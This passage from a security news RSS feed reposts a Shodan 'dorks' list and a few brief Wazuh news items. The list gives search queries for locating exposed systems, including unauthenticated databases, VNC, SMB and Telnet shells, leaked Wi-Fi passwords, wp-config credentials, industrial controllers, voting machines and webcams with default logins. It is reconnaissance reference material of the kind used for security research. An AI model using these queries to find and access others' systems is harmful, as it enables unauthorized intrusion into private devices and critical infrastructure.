Binom"<br>title:"Install concrete"<br>title:"Installing TYPO3 CMS"<br>title:"Install · Nagios Log Server"<br>title:"Install Umbraco"<br>title:"ISPConfig" http.favicon.hash:483383992<br>title:"issabel"<br>title:"ITRS"<br>title:"Jackett"<br>title:"Jamf Pro"<br>title:"JC-e converter webinterface"<br>title:"Jeecg-Boot"<br>title:"Jeedom"<br>title:"JIRA - JIRA setup"<br>title:"Jitsi Meet"<br>title:"Joomla Web Installer"<br>title:"JSON Server"<br>title:"JSPWiki"<br>title:"Juniper Web Device Manager"<br>title:"jupyter notebook"<br>title:"Kafka-Manager"<br>title:"keycloak"<br>title:"Kiali"<br>title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337<br>title:"KnowledgeTree Installer"<br>title:"Koel"<br>title:kubecost<br>title:Kube-state-metrics<br>title:"Lantronix"<br>title:"LDAP Account Manager"<br>title:"LibrePhotos"<br>title:"LibreSpeed"<br>title:"Libvirt"<br>title:"Lidarr"<br>title:"Liferay"<br>title:"Lightdash"<br>title:"LinkTap Gateway"<br>title:"Locust"<br>title:logger html:"htmlWebpackPlugin.options.title"<br>title:"Login - Authelia"<br>title:"Log in - Bitbucket"<br>title:"Login | Control WebPanel"<br>title:"Login | GYRA Master Admin"<br>title:"login" product:"Avtech"<br>title:"login" product:"Avtech AVN801 network camera"<br>title:"Log in | Telerik Report Server"<br>title:"Login to ICC PRO system"<br>title:"Login to TLR-2005KSH"<br>title:"LVM Exporter"<br>title:"MachForm Admin Panel"<br>title:"macOS Server"<br>title:"Magnolia Installation"<br>title:"Maltrail"<br>title:"MAMP"<br>title:"ManageEngine"<br>title:"ManageEngine Desktop Central"<br>title:"MantisBT"<br>title:"Matomo"<br>title:"Mautic"<br>title:"Metabase"<br>title:"Microsoft Azure Web App - Error 404"<br>title:"MinIO Console"<br>title:"mirth connect administrator"<br>title:"Mobotix"<br>title:"MobSF"<br>title:"Moleculer Microservices Project"<br>title:"MongoDB exporter"<br>'title:"Monstra :: Install"'<br>title:"Moodle"<br>title:"MySQLd exporter"<br>title:"myStrom"<br>title:"Nacos"<br>title:"Nagios XI"<br>title:"Named Process Exporter"<br>title:"NeoDash"<br>title:"Netdisco"<br>title:"Netman"<br>title:"netman 204"<br>title:"NetMizer"<br>"title:NextChat,\"ChatGPT Next Web\""<br>title:"NginX Auto Installer"<br>title="nginxwebui"<br>title:"Nifi"<br>"title:\"NiFi\""<br>title:"NiFi"<br>title:"NI Web-based Configuration &amp; Monitoring"<br>title:"NodeBB Web Installer"<br>title:"NoEscape - Login"<br>title:"Notion – One workspace. Every team."<br>title:"NP Data Cache"<br>title:"NPort Web Console"<br>title:"nsqadmin"<br>title:"Nuxeo Platform"<br>title:"O2 Easy Setup"<br>title=="O2OA"<br>title:"OCS Inventory"<br>title:"Odoo"<br>title:"Okta"<br>title:"OLT Web Management Interface"<br>title:"OneDev"<br>title:"OpenCart"<br>title:"opencats"<br>title:"OpenEMR Setup Tool"<br>title:"OpenMage Installation Wizard"<br>title:"OpenMediaVault"<br>title:"OpenNMS Web Console"<br>title:"openproject"<br>title:"OpenShift"<br>title:"OpenShift Assisted Installer"<br>title:"openSIS"<br>title:"OpenWRT"<br>title:"Oracle Application Server"<br>title:"Oracle Forms"<br>title:"Oracle Opera" &amp;&amp; html:"/OperaLogin/Welcome.do"<br>title:"Oracle PeopleSoft Sign-in"<br>title:"Orangescrum Setup Wizard"<br>title:"osticket"<br>title:"osTicket"<br>title:"Ovirt-Engine"<br>title:"owncloud"<br>title:"OXID eShop installation"<br>title:"Pa11y Dashboard"<br>title:"Pagekit Installer"<br>title:"PairDrop"<br>title:"Papercut"<br>'title:"Payara Micro #badassfish - Error report"'<br>title:"PCDN Cache Node Dataset"<br>title:"pCOWeb"<br>title:"Pega"<br>title:"perfSONAR"<br>title:" Permissions | Installer"<br>title:"Persis"<br>title:"PgHero"<br>title:"Pgwatch2"<br>title:"phpLDAPadmin"<br>title:"phpMemcachedAdmin"<br>title:"phpmyadmin"<br>title:"Pi-hole"<br>title:"Piwik › Installation"<br>title:"Plenti"<br>title:"Portainer"<br>title:"Postgres exporter"<br>title:"Powered by phpwind"<br>title:"Powered By vBulletin"<br>title:"PQube 3"<br>title:"PrestaShop Installation Assistant"<br>title:"Prison Management System"<br>title:"Pritunl"<br>title:"PrivateBin"<br>title:"PrivX"<br>title:"ProcessWire 3.x Installer"<br>title:"Pulsar Admin"<br>'title:"PuppetDB: Dashboard"'<br>title:"QlikView - AccessPoint"<br>title:"QuestDB · Console"<br>title:"RabbitMQ Exporter"<br>title:"Raspberry Shake Config"<br>title:"Ray Dashboard"<br>title:"rConfig"<br>title:"ReCrystallize"<br>title:"RedisInsight"<br>title:"Redpanda Console"<br>title:"Registration and Login System"<br>title:"Rekognition Image Validation Debug UI"<br>title:"reNgine"<br>title:"Reolink"<br>title:"Repetier-Server"<br>title:"ResourceSpace"<br>title:"Retool"<br>title:"RocketMQ"<br>title:"Room Alert"<br>title:"RStudio Sign In"<br>title:"ruckus"<br>"title:\"Rule Execution Server\""<br>title:"Rule Execution Server"<br>title:"Rundeck"<br>title:"Runtime Error"<br>title:"Rustici Content Controller"<br>title:"SaltStack Config"<br>title:"Sato"<br>title:"Scribble Diffusion"<br>title:"ScriptCase"<br>title:"SecurEnvoy"<br>title:SecuritySpy<br>title:"SelfCheck System Manager"<br>title:"SentinelOne - Management Console"<br>title:"Seq"<br>title:"SERVER MONITOR - Install"<br>title:"ServerStatus"<br>title:"servicenow"<br>title:"- setup" html:"Modem setup"<br>title:"Setup - mosparo"<br>title:"Setup wizard for webtrees"<br>title:"Setup Wizard" html:"/ruckus"<br>title:"Setup Wizard" html:"untangle"<br>title:"Setup Wizard" http.favicon.hash:-1851491385<br>title:"Setup Wizard" http.favicon.hash:2055322029<br>title:"ShareFile Storage Server"<br>title:"shenyu"<br>title:"Shopify App — Installation"<br>title:"shopware AG"<br>title:"ShopXO企业级B2C电商系统提供商"<br>title:"Sign In - Airflow"<br>title:"sitecore"<br>title:"Sitecore"<br>title:"Slurm HPC Dashboard"<br>title:"SmartPing Dashboard"<br>title:"SMF Installer"<br>title:"SmokePing Latency Page for Network Latency Grapher"<br>title:"Snoop Servlet"<br>title:"SoftEther VPN Server"<br>title:"Solr"<br>title:"Sonarqube"<br>title:"SonicWall Network Security"<br>title:"Speedtest Tracker"<br>title:"Splash"<br>title:"SqWebMail"<br>title:"Stremio-Jackett"<br>title:"Struts2 Showcase"<br>title:"Sugar Setup Wizard"<br>title:"SuiteCRM"<br>title:"SumoWebTools Installer"<br>title:"Superadmin UI - 4myhealth"<br>title:"SuperWebMailer"<br>title:"Symantec Endpoint Protection Manager"<br>title:"Synapse is running"<br>title:"SyncThru Web Service"<br>title:"System Properties"<br>title:"T24 Sign in"<br>title:"tailon"<br>title:"TamronOS IPTV系统"<br>title:"Tasmota"<br>title:"Tautulli - Welcome"<br>title:"TeamForge :"<br>title:"Tekton"<br>title:"TemboSocial Administration"<br>title:"Tenda Web Master"<br>title:"Teradek Cube Administrative Console"<br>title:"TestRail Installation Wizard"<br>title:"Thanos | Highly available Prometheus setup"<br>title:"ThinkPHP"<br>title:"THIS WEBSITE HAS BEEN SEIZED"<br>title:"Tigase XMPP Server"<br>title:"Tiki Wiki CMS"<br>title:"Tiny File Manager"<br>title:"Tiny Tiny RSS - Installer"<br>title:"TitanNit Web Control"<br>title:"tooljet"<br>title:"ToolJet - Dashboard"<br>title:"topaccess"<br>title:"Tornado - Login"<br>title:"Trassir Webview"<br>title:"Turbo Website Reviewer"<br>title:"TurnKey LAMP"<br>title:"ueditor"<br>title:"UniFi Wizard"<br>title:"uniGUI"<br>title:"Uptime Kuma"<br>title:"User Control Panel"<br>title:"USG FLEX"<br>title:"Utility Services Administration"<br>title:"UVDesk Helpdesk Community Edition - Installation Wizard"<br>title:"V2924"<br>title:"V2X Control"<br>"title:\"vBulletin\""<br>title:"veeam backup enterprise manager"<br>title:"Veeam Backup for GCP"<br>title:"Veeam Backup for Microsoft Azure"<br>title:"Veriz0wn"<br>title:"VideoXpert"<br>title:"Vitogate 300"<br>title:"VIVOTEK Web Console"<br>title:"vManage"<br>title:"VMware Appliance Management"<br>title:"VMware Aria Operations"<br>title:"VMware Carbon Black EDR"<br>title:"Vmware Cloud"<br>title:"VMware Cloud Director Availability"<br>title:"VMWARE FTP SERVER"<br>title:"VMware HCX"<br>title:"Vmware Horizon"<br>title:"VMware Site Recovery Manager"<br>title:"VMware VCenter"<br>title:"Vodafone Vox UI"<br>title:"vRealize Operations Manager"<br>title:"WAMPSERVER Homepage"<br>"title:\"Wazuh\""<br>title:"WebCalendar Setup Wizard"<br>title:"WebcomCo"<br>title:"Web Configurator"<br>title:"Web Configurator" html:"ACTi"<br>title:"Web File Manager"<br>title:"WebIQ"<br>title:"Webmin"<br>title:"Webmodule"<br>title:"WebPageTest"<br>title:"Webroot - Login"<br>title:"Webuzo Installer"<br>title:"Welcome to Azure Container Instances!"<br>title:"Welcome to C-Lodop"<br>title:"Welcome to Movable Type"<br>title:"Welcome to SmarterStats!"<br>title:"Welcome to your SWAG instance"<br>title:"WhatsUp Gold" http.favicon.hash:-2107233094<br>title:"WIFISKY-7层流控路由器"<br>title:"Wiki.js Setup"<br>title:"WorldServer"<br>title:"WoW-CMS | Installation"<br>title:"XenMobile"<br>"title:\"XenMobile - Console\""<br>title:"XEROX WORKCENTRE"<br>title:"xfinity"<br>title:"xnat"<br>title:"X-UI Login"<br>title:"Yellowfin Information Collaboration"<br>title:"Yii Debugger"<br>title:"Yopass"<br>title:"Your Own URL Shortener"<br>title:"YzmCMS"<br>title:"Zebra"<br>title:"Zend Server Test Page"<br>title:"Zenphoto install"<br>title:"Zeppelin"<br>title:"Zitadel"<br>title:"ZoneMinder"<br>title:"ZWave To MQTT"<br>title:"контроллер"<br>title:"孚盟云 "<br>title:"通达OA"<br>"Versa-Analytics-Server"<br>"wasabis3"<br>"/wd/hub"<br>"/websm/"<br>"Wing FTP Server"<br>"WL-500G"<br>"WL-520GU"<br>"workerman"<br>"WSO2 Carbon Server"<br>"www-authenticate:"<br>'www-authenticate: negotiate'<br>X-Amz-Server-Side-Encryption<br>"X-AspNetMvc-Version"<br>"X-AspNet-Version"<br>"X-ClickHouse-Summary"<br>"X-Influxdb-"<br>"X-Jenkins"<br>"X-Mod-Pagespeed:"<br>"X-Powered-By: Chamilo"<br>"X-Powered-By: Express"<br>"X-Powered-By: PHP"<br>"X-Recruiting:"<br>"X-TYPO3-Parsetime: 0ms"<br></code></pre> <h3>city:</h3> <p>Find devices in a particular city. <code>city:"Bangalore"</code></p> <h3>country:</h3> <p>Find devices in a particular country. <code>country:"IN"</code></p> <h3>geo:</h3> <p>Find devices by giving geographical coordinates. <code>geo:"56.913055,118.250862"</code></p> <h3>Location</h3> <p><code>country:us</code> <code>country:ru country:de city:chicago</code></p> <h3>hostname:</h3> <p>Find devices matching the hostname. <code>server: "gws" hostname:"google"</code> <code>hostname:example.com -hostname:subdomain.example.com</code> <code>hostname:example.com,example.org</code></p> <h3>net:</h3> <p>Find devices based on an IP address or /x CIDR. <code>net:210.214.0.0/16</code></p> <h3>Organization</h3> <p><code>org:microsoft</code> <code>org:"United States Department"</code></p> <h3>Autonomous System Number (ASN)</h3> <p><code>asn:ASxxxx</code></p> <h3>os:</h3> <p>Find devices based on operating system. <code>os:"windows 7"</code></p> <h3>port:</h3> <p>Find devices based on open ports. <code>proftpd port:21</code></p> <h3>before/after:</h3> <p>Find devices before or after between a given time. <code>apache after:22/02/2009 before:14/3/2010</code></p> <h3>SSL/TLS Certificates</h3> <p>Self signed <a href="https://www.kitploit.com/search/label/Certificates" target="_blank" title="certificates">certificates</a> <code>ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com</code></p> <p>Expired certificates <code>ssl.cert.expired:true</code></p> <p><code>ssl.cert.subject.cn:example.com</code></p> <h3>Device Type</h3> <p><code>device:firewall</code> <code>device:router</code> <code>device:wap</code> <code>device:webcam</code> <code>device:media</code> <code>device:"broadband router"</code> <code>device:pbx</code> <code>device:printer</code> <code>device:switch</code> <code>device:storage</code> <code>device:specialized</code> <code>device:phone</code> <code>device:"voip"</code> <code>device:"voip phone"</code> <code>device:"voip adaptor"</code> <code>device:"load balancer"</code> <code>device:"print server"</code> <code>device:terminal</code> <code>device:remote</code> <code>device:telecom</code> <code>device:power</code> <code>device:proxy</code> <code>device:pda</code> <code>device:bridge</code></p> <h3>Operating System</h3> <p><code>os:"windows 7"</code> <code>os:"windows server 2012"</code> <code>os:"linux 3.x"</code></p> <h3>Product</h3> <p><code>product:apache</code> <code>product:nginx</code> <code>product:android</code> <code>product:chromecast</code></p> <h3>Customer Premises Equipment (CPE)</h3> <p><code>cpe:apple</code> <code>cpe:microsoft</code> <code>cpe:nginx</code> <code>cpe:cisco</code></p> <h3>Server</h3> <p><code>server: nginx</code> <code>server: apache</code> <code>server: microsoft</code> <code>server: cisco-ios</code></p> <h3>ssh fingerprints</h3> <p><code>dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0</code></p> <h1>Web</h1> <h3>Pulse Secure</h3> <p><code>http.html:/dana-na</code></p> <h3>PEM Certificates</h3> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Tor / Dark Web sites</h3> <p><code>onion-location</code></p> <h1>Databases</h1> <h3>MySQL</h3> <p><code>"product:MySQL"</code> <code>mysql port:"3306"</code></p> <h3>MongoDB</h3> <p><code>"product:MongoDB"</code> <code>mongodb port:27017</code></p> <h3>Fully open MongoDBs</h3> <p><code>"MongoDB Server Information { "metrics":"</code> <code>"Set-Cookie: mongo-express=" "200 OK"</code> <code>"MongoDB Server Information" port:27017 -authentication</code></p> <h3>Kibana dashboards without authentication</h3> <p><code>kibana content-legth:217</code></p> <h3>elastic</h3> <p><code>port:9200 json</code> <code>port:"9200" all:elastic</code> <code>port:"9200" all:"elastic indices"</code></p> <h3>Memcached</h3> <p><code>"product:Memcached"</code></p> <h3>CouchDB</h3> <p><code>"product:CouchDB"</code> <code>port:"5984"+Server: "CouchDB/2.1.0"</code></p> <h3>PostgreSQL</h3> <p><code>"port:5432 PostgreSQL"</code></p> <h3>Riak</h3> <p><code>"port:8087 Riak"</code></p> <h3>Redis</h3> <p><code>"product:Redis"</code></p> <h3>Cassandra</h3> <p><code>"product:Cassandra"</code></p> <h1>Industrial Control Systems</h1> <h3>Samsung Electronic Billboards</h3> <p><code>"Server: Prismview Player"</code></p> <h3>Gas Station Pump Controllers</h3> <p><code>"in-tank inventory" port:10001</code></p> <h3>Fuel Pumps connected to internet:</h3> <p>No auth required to access CLI terminal. <code>"privileged command" GET</code></p> <h3>Automatic License Plate Readers</h3> <p><code>P372 "ANPR enabled"</code></p> <h3>Traffic Light Controllers / Red Light Cameras</h3> <p><code>mikrotik streetlight</code></p> <h3>Voting Machines in the United States</h3> <p>"voter system serial" country:US</p> <h3>Open ATM:</h3> <p>May allow for ATM Access availability <code>NCR Port:"161"</code></p> <h3>Telcos Running Cisco Lawful Intercept Wiretaps</h3> <p><code>"Cisco IOS" "ADVIPSERVICESK9_LI-M"</code></p> <h3>Prison Pay Phones</h3> <p><code>"[2J[H Encartele Confidential"</code></p> <h3>Tesla PowerPack Charging Status</h3> <p><code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>Electric Vehicle Chargers</h3> <p><code>"Server: gSOAP/2.8" "Content-Length: 583"</code></p> <h3>Maritime Satellites</h3> <p>Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!</p> <p><code>"Cobham SATCOM" OR ("Sailor" "VSAT")</code></p> <h3>Submarine Mission Control Dashboards</h3> <p><code>title:"Slocum Fleet Mission Control"</code></p> <h3>CAREL PlantVisor Refrigeration Units</h3> <p><code>"Server: CarelDataServer" "200 Document follows"</code></p> <h3>Nordex Wind Turbine Farms</h3> <p><code>http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"</code></p> <h3>C4 Max Commercial Vehicle GPS Trackers</h3> <p><code>"[1m[35mWelcome on console"</code></p> <h3>DICOM Medical X-Ray Machines</h3> <p>Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.</p> <p><code>"DICOM Server Response" port:104</code></p> <h3>GaugeTech Electricity Meters</h3> <p><code>"Server: EIG Embedded Web Server" "200 Document follows"</code></p> <h3>Siemens Industrial Automation</h3> <p><code>"Siemens, SIMATIC" port:161</code></p> <h3>Siemens HVAC Controllers</h3> <p><code>"Server: Microsoft-WinCE" "Content-Length: 12581"</code></p> <h3>Door / Lock Access Controllers</h3> <p><code>"HID VertX" port:4070</code></p> <h3>Railroad Management</h3> <p><code>"log off" "select the appropriate"</code></p> <h3>Tesla Powerpack charging Status:</h3> <p>Helps to find the charging status of tesla powerpack. <code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>XZERES Wind Turbine</h3> <p><code>title:"xzeres wind"</code></p> <h3>PIPS Automated License Plate Reader</h3> <p><code>"html:"PIPS Technology ALPR Processors""</code></p> <h3>Modbus</h3> <p><code>"port:502"</code></p> <h3>Niagara Fox</h3> <p><code>"port:1911,4911 product:Niagara"</code></p> <h3>GE-SRTP</h3> <p><code>"port:18245,18246 product:"general electric""</code></p> <h3>MELSEC-Q</h3> <p><code>"port:5006,5007 product:mitsubishi"</code></p> <h3>CODESYS</h3> <p><code>"port:2455 operating system"</code></p> <h3>S7</h3> <p><code>"port:102"</code></p> <h3>BACnet</h3> <p><code>"port:47808"</code></p> <h3>HART-IP</h3> <p><code>"port:5094 hart-ip"</code></p> <h3>Omron FINS</h3> <p><code>"port:9600 response code"</code></p> <h3>IEC 60870-5-104</h3> <p><code>"port:2404 asdu address"</code></p> <h3>DNP3</h3> <p><code>"port:20000 source address"</code></p> <h3>EtherNet/IP</h3> <p><code>"port:44818"</code></p> <h3>PCWorx</h3> <p><code>"port:1962 PLC"</code></p> <h3>Crimson v3.0</h3> <p><code>"port:789 product:"Red Lion Controls"</code></p> <h3>ProConOS</h3> <p><code>"port:20547 PLC"</code></p> <h1>Remote Desktop</h1> <h3>Unprotected VNC</h3> <p><code>"authentication disabled" port:5900,5901</code> <code>"authentication disabled" "RFB 003.008"</code></p> <h3>Windows RDP</h3> <p>99.99% are secured by a secondary Windows login screen.</p> <p><code>"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"</code></p> <h1>C2 Infrastructure</h1> <h3>CobaltStrike Servers</h3> <p><code>product:"cobalt strike team server"</code> <code>product:"Cobalt Strike Beacon"</code> <code>ssl.cert.serial:146473198</code> - default certificate serial number <code>ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1</code> <code>ssl:foren.zik</code></p> <h3>Brute Ratel</h3> <p><code>http.html_hash:-1957161625</code> <code>product:"Brute Ratel C4"</code></p> <h3>Covenant</h3> <p><code>ssl:"Covenant" http.component:"Blazor"</code></p> <h3>Metasploit</h3> <p><code>ssl:"MetasploitSelfSignedCA"</code></p> <h1>Network Infrastructure</h1> <h3>Hacked routers:</h3> <p>Routers which got compromised <code>hacked-router-help-sos</code></p> <h3>Redis open instances</h3> <p><code>product:"Redis key-value store"</code></p> <h3>Citrix:</h3> <p>Find Citrix Gateway. <code>title:"citrix gateway"</code></p> <h3>Weave Scope Dashboards</h3> <p>Command-line access inside <a href="https://www.kitploit.com/search/label/Kubernetes" target="_blank" title="Kubernetes">Kubernetes</a> pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.</p> <p><code>title:"Weave Scope" http.favicon.hash:567176827</code></p> <h3>Jenkins CI</h3> <p><code>"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"</code></p> <h3>Jenkins:</h3> <p>Jenkins Unrestricted Dashboard <code>x-jenkins 200</code></p> <h3>Docker APIs</h3> <p><code>"Docker Containers:" port:2375</code></p> <h3>Docker Private Registries</h3> <p><code>"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab</code></p> <h3>Pi-hole Open DNS Servers</h3> <p><code>"dnsmasq-pi-hole" "Recursion: enabled"</code></p> <h3>DNS Servers with recursion</h3> <p><code>"port: 53" Recursion: Enabled</code></p> <h3>Already Logged-In as root via Telnet</h3> <p><code>"root@" port:23 -login -password -name -Session</code></p> <h3>Telnet Access:</h3> <p>NO password required for telnet access. <code>port:23 console gateway</code></p> <h3>Polycom video-conference system no-auth shell</h3> <p><code>"polycom command shell"</code></p> <h3>NPort serial-to-eth / MoCA devices without password</h3> <p><code>nport -keyin port:23</code></p> <h3>Android Root Bridges</h3> <p>A tangential result of Google's sloppy fractured update approach. 🙄 More information here.</p> <p><code>"Android Debug Bridge" "Device" port:5555</code></p> <h3>Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords</h3> <p><code>Lantronix password port:30718 -secured</code></p> <h3>Citrix Virtual Apps</h3> <p><code>"Citrix Applications:" port:1604</code></p> <h3>Cisco Smart Install</h3> <p>Vulnerable (kind of "by design," but especially when exposed).</p> <p><code>"smart install client active"</code></p> <h3>PBX IP Phone Gateways</h3> <p><code>PBX "gateway console" -password port:23</code></p> <h3>Polycom Video Conferencing</h3> <p><code>http.title:"- Polycom" "Server: lighttpd"</code> <code>"Polycom Command Shell" -failed port:23</code></p> <h3>Telnet Configuration:</h3> <p><code>"Polycom Command Shell" -failed port:23</code></p> <p>Example: Polycom Video Conferencing</p> <h3>Bomgar Help Desk Portal</h3> <p><code>"Server: Bomgar" "200 OK"</code></p> <h3>Intel Active Management CVE-2017-5689</h3> <p><code>"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995</code> <code>"Active Management Technology"</code></p> <h3>HP iLO 4 CVE-2017-12542</h3> <p><code>HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900</code></p> <h3>Lantronix ethernet adapter's admin interface without password</h3> <p><code>"Press Enter for Setup Mode port:9999"</code></p> <h3>Wifi Passwords:</h3> <p>Helps to find the cleartext wifi passwords in Shodan. <code>html:"def_wirelesspassword"</code></p> <h3>Misconfigured Wordpress Sites:</h3> <p>The wp-config.php if accessed can give out the database credentials. <code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h1>Outlook Web Access:</h1> <h3>Exchange 2007</h3> <p><code>"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"</code></p> <h3>Exchange 2010</h3> <p><code>"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392</code></p> <h3>Exchange 2013 / 2016</h3> <p><code>"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"</code></p> <h3>Lync / Skype for Business</h3> <p><code>"X-MS-Server-Fqdn"</code></p> <h1>Network Attached Storage (NAS)</h1> <h3>SMB (Samba) File Shares</h3> <p>Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.</p> <p><code>"Authentication: disabled" port:445</code></p> <h3>Specifically domain controllers:</h3> <p><code>"Authentication: disabled" NETLOGON SYSVOL -unix port:445</code></p> <h3>Concerning default network shares of QuickBooks files:</h3> <p><code>"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445</code></p> <h3>FTP Servers with Anonymous Login</h3> <p><code>"220" "230 Login successful." port:21</code></p> <h3>Iomega / LenovoEMC NAS Drives</h3> <p><code>"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"</code></p> <h3>Buffalo TeraStation NAS Drives</h3> <p><code>Redirecting sencha port:9000</code></p> <h3>Logitech Media Servers</h3> <p><code>"Server: Logitech Media Server" "200 OK"</code></p> <p>Example: Logitech Media Servers</p> <h3>Plex Media Servers</h3> <p><code>"X-Plex-Protocol" "200 OK" port:32400</code></p> <h3>Tautulli / PlexPy Dashboards</h3> <p><code>"CherryPy/5.1.0" "/home"</code></p> <h3>Home router attached USB</h3> <p><code>"IPC$ all storage devices"</code></p> <h1>Webcams</h1> <h3>Generic camera search</h3> <p><code>title:camera</code></p> <h3>Webcams with screenshots</h3> <p><code>webcam has_screenshot:true</code></p> <h3>D-Link webcams</h3> <p><code>"d-Link Internet Camera, 200 OK"</code></p> <h3>Hipcam</h3> <p><code>"Hipcam RealServer/V1.0"</code></p> <h3>Yawcams</h3> <p><code>"Server: yawcam" "Mime-Type: text/html"</code></p> <h3>webcamXP/webcam7</h3> <p><code>("webcam 7" OR "webcamXP") http.component:"mootools" -401</code></p> <h3>Android IP Webcam Server</h3> <p><code>"Server: IP Webcam Server" "200 OK"</code></p> <h3>Security DVRs</h3> <p><code>html:"DVR_H264 ActiveX"</code></p> <h3>Surveillance Cams:</h3> <p>With username:admin and password: :P <code>NETSurveillance uc-httpd</code> <code>Server: uc-httpd 1.0.0</code></p> <h1>Printers &amp; Copiers:</h1> <h3>HP Printers</h3> <p><code>"Serial Number:" "Built:" "Server: HP HTTP"</code></p> <h3>Xerox Copiers/Printers</h3> <p><code>ssl:"Xerox Generic Root"</code></p> <h3>Epson Printers</h3> <p><code>"SERVER: EPSON_Linux UPnP" "200 OK"</code></p> <p><code>"Server: EPSON-HTTP" "200 OK"</code></p> <h3>Canon Printers</h3> <p><code>"Server: KS_HTTP" "200 OK"</code></p> <p><code>"Server: CANON HTTP Server"</code></p> <h1>Home Devices</h1> <h3>Yamaha Stereos</h3> <p><code>"Server: AV_Receiver" "HTTP/1.1 406"</code></p> <h3>Apple AirPlay Receivers</h3> <p>Apple TVs, HomePods, etc.</p> <p><code>"\x08_airplay" port:5353</code></p> <h3>Chromecasts / Smart TVs</h3> <p><code>"Chromecast:" port:8008</code></p> <h3>Crestron Smart Home Controllers</h3> <p><code>"Model: PYNG-HUB"</code></p> <h1>Random Stuff</h1> <h3>Calibre libraries</h3> <p><code>"Server: calibre" http.status:200 http.title:calibre</code></p> <h3>OctoPrint 3D Printer Controllers</h3> <p><code>title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944</code></p> <h3>Etherium Miners</h3> <p><code>"ETH - Total speed"</code></p> <h3>Apache Directory Listings</h3> <p>Substitute .pem with any extension or a filename like phpinfo.php.</p> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Misconfigured WordPress</h3> <p>Exposed wp-config.php files containing database credentials.</p> <p><code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h3>Too Many Minecraft Servers</h3> <p><code>"Minecraft Server" "protocol 340" port:25565</code></p> <h3>Literally Everything in North Korea</h3> <p><code>net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24</code></p><br><br><div><b><span><a class="kiploit-download" href="https://github.com/nullfuzz-pentest/shodan-dorks" rel="nofollow" target="_blank" title="Download Shodan-Dorks">Download Shodan-Dorks</a></span></b></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enhancing your DevSecOps with Wazuh, the open source XDR platform]]></title>
<description><![CDATA[Security shouldn't wait until the end of development. Wazuh brings real-time threat detection, compliance, and vulnerability scanning into your DevOps pipeline—powering a stronger DevSecOps strategy from day one. Learn more about how Wazuh can help secure your development cycle. [...]]]></description>
<link>https://tsecurity.de/de/2723795/it-security-nachrichten/enhancing-your-devsecops-with-wazuh-the-open-source-xdr-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2723795/it-security-nachrichten/enhancing-your-devsecops-with-wazuh-the-open-source-xdr-platform/</guid>
<pubDate>Mon, 14 Apr 2025 16:48:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security shouldn't wait until the end of development. Wazuh brings real-time threat detection, compliance, and vulnerability scanning into your DevOps pipeline—powering a stronger DevSecOps strategy from day one. Learn more about how Wazuh can help secure your development cycle. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh: Kostenlose Open-Source SIEM und XDR Lösung im Test - Security-Insider]]></title>
<description><![CDATA[... Windows 10, Windows 11 sowie Windows Server 2019 liefen. Dabei traten keine Probleme auf und die betroffenen Rechner meldeten sich kurz darauf ...]]></description>
<link>https://tsecurity.de/de/2710340/windows-server/wazuh-kostenlose-open-source-siem-und-xdr-loesung-im-test-security-insider/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2710340/windows-server/wazuh-kostenlose-open-source-siem-und-xdr-loesung-im-test-security-insider/</guid>
<pubDate>Mon, 07 Apr 2025 17:19:38 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... Windows 10, Windows 11 sowie <b>Windows Server</b> 2019 liefen. Dabei traten keine Probleme auf und die betroffenen Rechner meldeten sich kurz darauf ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh im Test: Flexibles SIEM mit XDR-Funktionen]]></title>
<description><![CDATA[Die kostenlose Open-Source-Lösung Wazuh vereint SIEM- und XDR-Funktionalitäten und punktet im Test mit Endpoint-Security, Threat-Hunting und Cloud-Schutz. Trotz einfacher Installation und geringer Hardware-Anforderungen offenbart das Tool aber auch Herausforderungen im täglichen Betrieb.]]></description>
<link>https://tsecurity.de/de/2709466/it-security-nachrichten/wazuh-im-test-flexibles-siem-mit-xdr-funktionen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2709466/it-security-nachrichten/wazuh-im-test-flexibles-siem-mit-xdr-funktionen/</guid>
<pubDate>Mon, 07 Apr 2025 11:19:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
